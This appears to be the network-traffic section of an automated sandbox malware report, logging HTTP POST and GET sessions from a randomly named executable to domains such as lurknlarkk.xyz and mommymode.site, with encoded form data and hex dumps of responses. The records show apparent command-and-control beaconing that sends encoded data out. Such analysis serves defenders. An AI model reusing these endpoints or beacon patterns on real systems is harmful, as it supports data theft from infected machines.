                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 56 3d 64 59 35 4c 66 42 78 54 38 2b 34 4f 54 59 67 58 4b 74 5a 62 4e 69 66 55 73 6f 44 58 2b 75 57 7a 4c 65 52 52 6e 39 7a 64 73 78 46 6c 64 37 6e 36 38 6d 79 48 32 47 64 32 57 32 46 53 30 33 48 50 74 2b 57 2f 39 4e 41 54 46 69 62 5a 79 69 59 34 35 75 72 79 55 54 56 44 34 59 38 50 63 74 57 51 47 4c 44 4f 34 30 67 67 65 38 46 38 54 41 62 50 6a 4d 32 4e 61 35 37 71 35 41 78 49 6e 30 71 62 39 41 3d 3d 26 6e 74 48 78 3d 44 56 44 44 57 52 37 30 50 34 55 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nV=dY5LfBxT8+4OTYgXKtZbNifUsoDX+uWzLeRRn9zdsxFld7n68myH2Gd2W2FS03HPt+W/9NATFibZyiY45uryUTVD4Y8PctWQGLDO40gge8F8TAbPjM2Na57q5AxIn0qb9A==&ntHx=DVDDWR70P4Ux"}</script></head></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  37192.168.2.550012172.191.244.62804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:40:24.286417007 CEST727OUTPOST /jqkr/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.lurknlarkk.xyz
                                                                                                                  Origin: http://www.lurknlarkk.xyz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Referer: http://www.lurknlarkk.xyz/jqkr/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 75 2f 56 53 47 2f 74 7a 70 32 43 34 4b 51 6f 4b 64 2f 79 78 73 62 6c 5a 79 55 61 30 56 55 49 49 79 4d 6a 53 42 72 75 77 55 76 68 67 61 4a 57 39 61 62 69 42 7a 75 39 45 33 45 56 57 35 6f 42 6e 73 30 52 2f 43 71 6d 77 64 49 5a 58 2f 35 4f 36 4a 42 7a 48 35 2f 73 45 39 30 77 4a 73 47 65 46 6f 38 57 34 4b 63 6c 66 79 75 46 32 2b 46 47 70 5a 59 37 6d 66 59 42 6e 64 74 34 2b 52 49 48 78 6b 50 78 50 48 75 48 32 68 5a 35 53 59 6b 53 37 45 63 53 4b 47 4c 68 43 76 75 72 34 53 77 4a 33 69 65 57 37 70 30 62 77 78 64 42 54 73 41 54 6f 4c 54 57 6b 67 74 54 44 52 67 43 6e 74 58 51 48 69 2f 52 46 65 35 38 3d
                                                                                                                  Data Ascii: nV=u/VSG/tzp2C4KQoKd/yxsblZyUa0VUIIyMjSBruwUvhgaJW9abiBzu9E3EVW5oBns0R/CqmwdIZX/5O6JBzH5/sE90wJsGeFo8W4KclfyuF2+FGpZY7mfYBndt4+RIHxkPxPHuH2hZ5SYkS7EcSKGLhCvur4SwJ3ieW7p0bwxdBTsAToLTWkgtTDRgCntXQHi/RFe58=
                                                                                                                  Oct 8, 2024 15:40:24.763355970 CEST195INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:24 GMT
                                                                                                                  Content-Length: 19
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                  Data Ascii: 404 page not found


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  38192.168.2.550013172.191.244.62804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:40:26.823380947 CEST747OUTPOST /jqkr/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.lurknlarkk.xyz
                                                                                                                  Origin: http://www.lurknlarkk.xyz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Referer: http://www.lurknlarkk.xyz/jqkr/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 75 2f 56 53 47 2f 74 7a 70 32 43 34 4d 78 34 4b 62 63 61 78 6b 62 6c 57 75 6b 61 30 62 30 49 45 79 4d 76 53 42 75 4f 67 55 64 31 67 61 6f 6d 39 62 61 69 42 77 75 39 45 2f 6b 56 54 30 49 42 73 73 30 4e 33 43 6f 79 77 64 49 39 58 2f 38 71 36 4b 79 62 47 2f 76 73 47 32 55 77 4c 68 6d 65 46 6f 38 57 34 4b 63 67 45 79 75 74 32 2b 30 57 70 5a 39 58 6e 56 34 42 6d 55 4e 34 2b 56 49 48 31 6b 50 78 78 48 71 66 4d 68 66 31 53 59 68 75 37 45 49 47 4e 50 4c 68 49 72 75 71 50 63 54 74 7a 6b 75 71 72 68 6c 32 69 6b 2b 64 61 70 32 2b 43 52 78 65 4d 7a 4e 2f 37 42 7a 4b 51 38 6e 78 75 34 63 42 31 41 75 71 67 53 78 70 68 74 58 56 72 47 77 69 48 32 6e 48 2b 6d 68 52 73
                                                                                                                  Data Ascii: nV=u/VSG/tzp2C4Mx4KbcaxkblWuka0b0IEyMvSBuOgUd1gaom9baiBwu9E/kVT0IBss0N3CoywdI9X/8q6KybG/vsG2UwLhmeFo8W4KcgEyut2+0WpZ9XnV4BmUN4+VIH1kPxxHqfMhf1SYhu7EIGNPLhIruqPcTtzkuqrhl2ik+dap2+CRxeMzN/7BzKQ8nxu4cB1AuqgSxphtXVrGwiH2nH+mhRs
                                                                                                                  Oct 8, 2024 15:40:27.311445951 CEST195INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:27 GMT
                                                                                                                  Content-Length: 19
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                  Data Ascii: 404 page not found


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  39192.168.2.550014172.191.244.62804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:40:29.380522013 CEST1764OUTPOST /jqkr/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.lurknlarkk.xyz
                                                                                                                  Origin: http://www.lurknlarkk.xyz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Referer: http://www.lurknlarkk.xyz/jqkr/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 75 2f 56 53 47 2f 74 7a 70 32 43 34 4d 78 34 4b 62 63 61 78 6b 62 6c 57 75 6b 61 30 62 30 49 45 79 4d 76 53 42 75 4f 67 55 64 74 67 61 2b 36 39 61 39 57 42 78 75 39 45 31 45 56 53 30 49 42 4c 73 30 46 7a 43 6f 76 53 64 4b 56 58 2b 65 69 36 64 7a 62 47 78 76 73 47 72 45 77 4b 73 47 66 66 6f 38 47 30 4b 63 51 45 79 75 74 32 2b 33 65 70 65 6f 37 6e 54 34 42 6e 64 74 35 73 52 49 48 64 6b 50 35 68 48 71 54 63 67 76 56 53 5a 42 65 37 43 39 53 4e 45 4c 68 4f 6e 4f 71 58 63 54 51 74 6b 74 4f 6e 68 6c 44 33 6b 2b 31 61 71 78 48 62 44 79 6d 46 33 4f 2f 6c 50 45 7a 77 73 52 68 79 36 36 5a 67 41 76 4b 46 62 7a 46 6f 69 44 74 79 55 42 44 71 69 41 66 77 30 57 4a 6c 78 77 4a 58 62 79 75 43 43 45 71 57 4d 4d 79 6c 76 42 72 6e 6b 51 6e 48 38 32 61 33 6c 41 44 49 4b 63 50 2f 34 4a 59 74 57 4c 4c 57 62 43 57 63 52 44 52 7a 33 35 71 31 52 4d 34 6a 4b 31 50 39 62 76 68 4e 4c 67 6d 55 70 31 50 66 2b 7a 76 67 63 6c 53 2f 65 65 36 52 74 5a 69 53 53 34 48 6e 39 4f 65 4a 57 4a 37 2b 54 34 54 75 77 39 35 39 74 44 78 [TRUNCATED]
                                                                                                                  Data Ascii: nV=u/VSG/tzp2C4Mx4KbcaxkblWuka0b0IEyMvSBuOgUdtga+69a9WBxu9E1EVS0IBLs0FzCovSdKVX+ei6dzbGxvsGrEwKsGffo8G0KcQEyut2+3epeo7nT4Bndt5sRIHdkP5hHqTcgvVSZBe7C9SNELhOnOqXcTQtktOnhlD3k+1aqxHbDymF3O/lPEzwsRhy66ZgAvKFbzFoiDtyUBDqiAfw0WJlxwJXbyuCCEqWMMylvBrnkQnH82a3lADIKcP/4JYtWLLWbCWcRDRz35q1RM4jK1P9bvhNLgmUp1Pf+zvgclS/ee6RtZiSS4Hn9OeJWJ7+T4Tuw959tDxvhL3s4do2RqGqBFtlNzq+ABsSTdfmsbZhkfoGHFCwvNu2F76fCfFJfTXSy6FvQuJJqMJorWrLW+cqPGnOudvQI+F4IP6+BjTpqx7VGQfzlaVIY3jPLvsGUXQunAVT0omWywKkaQLTPRQmFo25cw1/3+mgTf3N9FBoCJDP6Yev5iXbq3jEseIFS7HQSJGkiRTRSPEYrPKJZ1OjEt9z+DARweyfJdlkcFkgY8XUxhycPTgRb49wEdU2fqnA1NyO/6lCld1Z1jKSduoVsXtvpu/SjPT6eLTCjXkv7ja8uOtlRXz0+n3KAHCAURGvboOnJIINH3+B+dnH6KyLFCJjTeOCbCt708fnhE8Ars6qHim0aOVz7gg5gQ/2UDKaidg7eo0N314L8u/43stbeveL5DAEwtHhepAlsjLAcJlP46WRSK53758ZFjwq4a+waN9e9QxD5tumfjH7n8MeFO73UVbY2DYbWU05CPEEuXqpPCPxNaVNcetgL8PKfRnFK0S9KtJPlcDHlKxImxzkQHYXAYL8zHPoFrL7sKw7EdCmcTnLla2H/7ZRu4vklPRpPujui79pSU6zZdJ5iSjrHGkfASZcFKtWlmbQJWV/ikJ5JRFe8G0CDgnRFV/2zeLNBrgISj/KZIYHBTSSfO29Md9cQvCXZNdM5j4XoGWdA [TRUNCATED]
                                                                                                                  Oct 8, 2024 15:40:29.819581985 CEST195INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:29 GMT
                                                                                                                  Content-Length: 19
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                  Data Ascii: 404 page not found


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  40192.168.2.550015172.191.244.62804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:40:31.927400112 CEST472OUTGET /jqkr/?nV=j99yFPFWu1ukFCAkcsa1pdNTyzikS1cIw9CibMKFTP9vYaGLd9Ca8ZMxvCgy8ZIQlD5WNv+rF4xM8fWyLzqu8NEu/AkJhGyL6Y/IOsxIi9hhzm6Wfo2GHcU4TuRzIqeNlQ==&ntHx=DVDDWR70P4Ux HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Host: www.lurknlarkk.xyz
                                                                                                                  Connection: close
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Oct 8, 2024 15:40:32.437335968 CEST195INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:32 GMT
                                                                                                                  Content-Length: 19
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                  Data Ascii: 404 page not found


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  41192.168.2.550016162.241.244.106804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:40:37.511646032 CEST727OUTPOST /hya5/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.mommymode.site
                                                                                                                  Origin: http://www.mommymode.site
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Referer: http://www.mommymode.site/hya5/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 70 44 67 47 65 44 73 38 59 6c 37 6e 48 43 32 6a 65 59 30 52 44 5a 59 42 6f 2b 64 36 4b 53 30 72 43 58 77 45 30 75 6a 59 50 6b 72 4c 54 70 47 73 5a 4e 30 72 33 5a 31 4f 68 4a 75 6a 4a 35 62 44 2b 73 32 2f 43 65 64 68 55 48 6b 6f 59 58 56 32 71 44 33 64 62 6e 69 42 5a 6c 36 65 53 49 59 61 51 65 62 77 70 66 36 61 78 74 64 6b 5a 7a 2b 31 68 75 34 74 71 73 55 65 77 52 62 4e 39 34 4d 31 45 39 2b 58 50 61 67 6a 5a 51 6c 55 71 77 32 53 76 38 78 39 53 47 6a 52 70 66 7a 38 39 35 45 51 35 61 76 39 43 2b 53 4d 31 64 4a 35 31 76 49 30 58 69 4f 43 4b 41 4d 5a 32 31 6a 53 37 75 58 34 42 4c 43 35 61 78 63 3d
                                                                                                                  Data Ascii: nV=pDgGeDs8Yl7nHC2jeY0RDZYBo+d6KS0rCXwE0ujYPkrLTpGsZN0r3Z1OhJujJ5bD+s2/CedhUHkoYXV2qD3dbniBZl6eSIYaQebwpf6axtdkZz+1hu4tqsUewRbN94M1E9+XPagjZQlUqw2Sv8x9SGjRpfz895EQ5av9C+SM1dJ51vI0XiOCKAMZ21jS7uX4BLC5axc=
                                                                                                                  Oct 8, 2024 15:40:38.306790113 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:38 GMT
                                                                                                                  Server: Apache
                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                  Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"
                                                                                                                  Upgrade: h2,h2c
                                                                                                                  Connection: Upgrade
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Content-Encoding: gzip
                                                                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                  X-Newfold-Cache-Level: 2
                                                                                                                  X-Endurance-Cache-Level: 2
                                                                                                                  X-nginx-cache: WordPress
                                                                                                                  Content-Length: 12947
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd b2 eb 72 e3 c6 92 2d fc db 7a 8a 6a 76 d8 22 6d 16 78 a7 24 48 94 67 b6 2f e7 78 62 7b db e1 b6 67 62 c2 ed e8 28 02 09 a0 5a 85 2a ec aa 02 29 36 47 bf ce 53 9c 5f e7 15 bf 47 f8 b2 00 90 a2 28 50 54 eb ba db 16 01 54 65 ae 5c b9 d6 3a 7b f3 fd 2f df fd fe df bf fe 40 12 9b 8a f3 83 33 f7 20 82 c9 78 d2 00 49 ff 78 d7 70 67 c0 c2 f3 83 2f ce 52 b0 8c 04 09 d3 06 ec a4 f1 c7 ef 3f d2 e3 06 e9 ac 6f 24 4b 61 d2 98 71 98 67 4a db 06 09 94 b4 20 b1 72 ce 43 9b 4c 42 98 f1 00 68 f1 d1 26 5c 72 cb 99 a0 26 60 02 26 bd 02 67 03 e6 50 ab a9 b2 e6 70 0d 72 98 b2 4b ca 53 16 03 cd 34 b8 21 be 60 3a 86 c3 a2 d1 72 2b e0 fc 57 bc 25 52 59 12 a9 5c 86 e4 ab b7 c7 fd 5e ef 94 fc 4d 09 fc 60 69 76 4a 7e d5 60 ed 82 fc c2 0c 37 67 9d b2 eb e0 4c 70 79 41 34 88 c9 61 28 8d 83 8f c0 06 c9 21 49 f0 6d 72 d8 e9 a4 2a 4d 17 a9 0a c1 33 dc 56 13 d7 3d 0d 26 2c 68 c9 2c 34 88 5d 64 a8 00 cb 32 c1 03 66 b9 92 1d 6d cc 37 97 a9 c0 2b 37 6b d2 d8 c1 85 7c a5 d9 3f 73 75 4a 7e 04 08 1b e5 e0 [TRUNCATED]
                                                                                                                  Data Ascii: r-zjv"mx$Hg/xb{gb(Z*)6GS_G(PTTe\:{/@3 xIxpg/R?o$KaqgJ rCLBh&\r&`&gPprKS4!`:r+W%RY\^M`ivJ~`7gLpyA4a(!Imr*M3V=&,h,4]d2fm7+7k|?suJ~FbmfK:$D}U&-h9{#ecEww7w{S4F^/;v.-{acJ@|s*4e3Jm~SyFDQMqP4Qp_/ho\]t~C~OP dU4(1MTtuN&V/;;Y<)~S|-oDDcUpj_7-B)Z8Q/Uofm73N&8-<dbyuZ.X]kh#'g#rgB,l
                                                                                                                  Oct 8, 2024 15:40:38.306807995 CEST1236INData Raw: 08 4e b2 e0 d4 7e 2a 36 ad 53 0d 36 d7 92 58 0f 30 04 8b e6 da 57 94 af b5 ac 2e 61 32 99 e8 3f ed 5f 57 ad 6b 81 f3 95 c0 66 ce 9d fc 58 1d 60 a2 1a 91 60 71 c3 af 1a 1d 4c e3 7d 1e 1e 0f 02 fc 8d a2 c1 fb 3c 82 6e f4 3e ef 77 bb 21 fe 8e d9 51
                                                                                                                  Data Ascii: N~*6S6X0W.a2?_WkfX``qL}<n>w!QyY6QMs6}Ul6!N]G;mm2\(:::88uZXWllx7m\MUv=Z>cI#!D\Bx3TDKK)W_X&o]"
                                                                                                                  Oct 8, 2024 15:40:38.306821108 CEST1236INData Raw: 4d 55 08 7f 55 8e ac ee 30 94 96 07 4c 50 a1 ff 6a b5 6f e3 68 1e 27 9f 07 a4 85 03 ea 3f 11 a1 5b 38 0f 25 34 78 22 42 b7 70 1e 4a 68 f8 44 84 6e e1 3c 94 d0 e8 89 08 dd c2 79 28 a1 f1 13 11 ba 85 f3 30 42 4b ad 2c b3 e0 f7 8e bb 21 c4 57 07 67
                                                                                                                  Data Ascii: MUU0LPjoh'?[8%4x"BpJhDn<y(0BK,!WgxN\ik%K%jR&DAg)iF^{q.Uxe6ou!*|lTqm,k-e$BZ}m]~=-vMoo||".};.^X
                                                                                                                  Oct 8, 2024 15:40:38.306865931 CEST1236INData Raw: c4 da cc ef 74 52 95 a6 8b 54 85 e0 e1 a6 d0 41 7e 28 80 c5 ac 77 8a 2d 4c 67 03 b6 c3 8c 01 6b 3a 88 d2 d9 31 c1 4b b9 f4 f0 fe db 19 e8 49 cf eb 7a dd 43 92 42 c8 d9 e4 90 09 71 48 3a db ba 41 aa 3e 72 5a ee 72 53 b2 83 2f 78 1a 3b c1 4c ca 05
                                                                                                                  Data Ascii: tRTA~(w-Lgk:1KIzCBqH:A>rZrS/x;L,}dy!7Ziem<"U$a^'eIy3M.Rc.}%kv)eq'O5,jRb!U5PBim{Li5:v?lB/0OYoo{
                                                                                                                  Oct 8, 2024 15:40:38.306876898 CEST1236INData Raw: 76 37 bb 6c 5d fd 5b 0a 21 67 c4 04 1a 40 12 26 43 d2 bc a6 3b ee ba 9a e5 53 51 42 b0 ab ab 83 b3 4e 21 e5 f9 c1 99 e0 f2 82 68 10 93 c3 e2 c4 24 00 f6 90 f0 70 72 28 a3 90 ce 95 2c ec 13 2a b8 30 34 b7 5c 20 18 18 1a 18 73 48 12 0d d1 e4 30 b1
                                                                                                                  Data Ascii: v7l][!g@&C;SQBN!h$pr(,*04\ sH06;T"U!x8:%PLLE2,:i0DqHGJTq4`'"xIzCRh99dB.Xw!.Q(:?p&Y:,@||upJQ@;4S/|
                                                                                                                  Oct 8, 2024 15:40:38.306883097 CEST1236INData Raw: 76 73 de b2 61 b7 3b 1c d6 e2 47 0a b1 0d ff 04 94 9a 94 09 e1 93 40 b0 34 6b f6 34 20 88 fb 25 df 90 66 b3 37 9b 13 4a ba 5e 1f 0f 5a e4 6b 7c eb 1e 8f 5b 58 80 4f 77 b4 1b 35 85 90 e7 e9 1a d6 1b 94 c0 c5 73 07 74 bf 57 42 8f ee 46 16 4c c7 b0
                                                                                                                  Data Ascii: vsa;G@4k4 %f7J^Zk|[XOw5stWBFLV;Ghh7hC>JwzVWwK.b21JMk)^oE?>:F.\,0yc3BY>t_wnXF7IW_.1HIcKc2B,
                                                                                                                  Oct 8, 2024 15:40:38.306894064 CEST1236INData Raw: 9f 05 3f 6b 1c c6 ce 58 cd b8 84 f0 b1 ab 6f 43 3d 54 81 2d 9c 17 12 22 12 70 d9 5a de 3b 45 3b 71 62 cd c3 cf c1 d9 b2 1e 17 f6 98 e0 b1 14 10 d9 25 9e 30 5c d6 bd af b6 e1 52 a0 32 d7 76 dc 3c 2e b6 ec 43 ba 1b 57 f3 38 59 03 17 1f f5 c8 0e a4
                                                                                                                  Data Ascii: ?kXoC=T-"pZ;E;qb%0\R2v<.CW8Y9iAr}rfJ[&oS?4uS*TyVk<r!Z-sI<fb]4jqu,3ZD^\aEjK\dZv?tY{ZLBj|RuM6UX
                                                                                                                  Oct 8, 2024 15:40:38.307131052 CEST1000INData Raw: a5 53 04 7f 82 81 05 50 dd 3c 1e 27 16 43 00 20 ab 58 3c 64 d6 16 c8 4e 8f 1e 39 67 1b 64 57 ca 56 f9 7e 98 55 37 21 76 ee f2 b8 21 5b 18 3b a7 64 b9 ce c4 63 46 94 00 35 f8 53 66 1e 86 eb 1a 6b f0 02 25 ad 66 c6 3e 08 73 d5 5c e7 a8 e6 29 d3 8b
                                                                                                                  Data Ascii: SP<'C X<dN9gdWV~U7!v![;dcF5Sfk%f>s\)YYCq5^5&V4II('YnL)q9i`NE(u&`~]F8 uc(g@<R+X:uQJ3?Nih
                                                                                                                  Oct 8, 2024 15:40:38.307199001 CEST1236INData Raw: 49 7f 80 3f bd 61 d5 53 1f ac e2 46 65 d7 d0 95 aa eb c1 9f 30 49 21 5c 22 64 d7 fd 2b 95 bc 0e a3 93 12 43 22 26 87 c5 89 49 00 ec 61 19 4e a5 02 95 a6 a0 03 a0 b8 b0 ca 6d 11 46 92 68 88 26 87 89 b5 99 df e9 a4 58 b1 48 55 08 1e ba 0d 1d 0c 74
                                                                                                                  Data Ascii: I?aSFe0I!\"d+C"&IaNmFh&XHUtbL093F[xCBqH:fjPJQEnYI ea2$]qvbxuFPM Rz>[MG( )/jN<,>_8%Wgb"-
                                                                                                                  Oct 8, 2024 15:40:38.307209969 CEST1236INData Raw: 97 30 19 33 f2 8b 84 c6 9e a5 86 2f b0 54 50 b0 a1 4a 02 2e 76 5c 2d a6 21 ce 05 d3 4f b7 1c b7 4c f0 e0 5f 63 b9 92 cb 03 76 7b a7 72 1d 00 79 c7 a4 21 bf 6a b5 cf bd fe 8b 44 d2 51 a2 06 29 d1 4c 2b 3a eb f7 aa 2d fb 0f ca e6 5d 2b d6 78 f8 ea
                                                                                                                  Data Ascii: 03/TPJ.v\-!OL_cv{ry!jDQ)L+:-]+x+W]t^/Uu|)3%N~#_}U=z/_}U=y/_}z3hpcvL7[-8xVuW{8L?wzg5uW{N^oguW{w,
                                                                                                                  Oct 8, 2024 15:40:38.311754942 CEST1236INData Raw: 6b f1 7e 7e f0 85 fb 77 96 31 9b 10 14 e3 e7 de 80 8c 02 3a f0 06 a4 4b c7 a4 ef 1d e1 ef 18 51 7a de d0 1b b9 6f 7c 1b 90 81 77 24 b0 e8 98 b8 bf 9e d7 2b fe f0 dd 9d 05 3d 82 87 7d ac aa 2a ab 27 22 92 31 75 08 63 3a 7e d7 1b e3 c1 88 b8 71 9f
                                                                                                                  Data Ascii: k~~w1:KQzo|w$+=}*'"1uc:~qRz8#~x#)HIq{;uP<)b/U){nv(=Kx4Y'e|5Myffrt"Kk4*Tq_3W*Pi:*h:mry


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  42192.168.2.550017162.241.244.106804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:40:40.057022095 CEST747OUTPOST /hya5/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.mommymode.site
                                                                                                                  Origin: http://www.mommymode.site
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Referer: http://www.mommymode.site/hya5/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 70 44 67 47 65 44 73 38 59 6c 37 6e 47 69 47 6a 64 37 63 52 49 5a 59 43 6b 65 64 36 45 79 30 76 43 58 38 45 30 71 37 32 50 58 50 4c 53 4d 69 73 65 4d 30 72 79 5a 31 4f 31 35 75 6d 45 5a 61 75 2b 73 71 33 43 66 78 68 55 48 77 6f 59 56 64 32 71 55 6a 63 61 33 69 66 4d 31 36 63 57 49 59 61 51 65 62 77 70 66 75 77 78 74 56 6b 5a 6a 4f 31 69 4c 4d 71 30 38 55 66 6d 42 62 4e 35 34 4d 78 45 39 2f 77 50 62 39 4f 5a 53 64 55 71 30 79 53 76 4f 5a 2b 63 47 69 61 6d 2f 7a 72 74 72 35 72 67 4a 75 78 4f 63 36 4f 72 38 31 42 77 5a 6c 65 4e 41 47 71 5a 67 67 68 6d 6d 72 6c 71 65 32 52 62 6f 53 4a 45 6d 4b 57 31 75 6d 47 51 74 52 78 68 37 75 57 59 37 63 62 75 74 2b 52
                                                                                                                  Data Ascii: nV=pDgGeDs8Yl7nGiGjd7cRIZYCked6Ey0vCX8E0q72PXPLSMiseM0ryZ1O15umEZau+sq3CfxhUHwoYVd2qUjca3ifM16cWIYaQebwpfuwxtVkZjO1iLMq08UfmBbN54MxE9/wPb9OZSdUq0ySvOZ+cGiam/zrtr5rgJuxOc6Or81BwZleNAGqZgghmmrlqe2RboSJEmKW1umGQtRxh7uWY7cbut+R
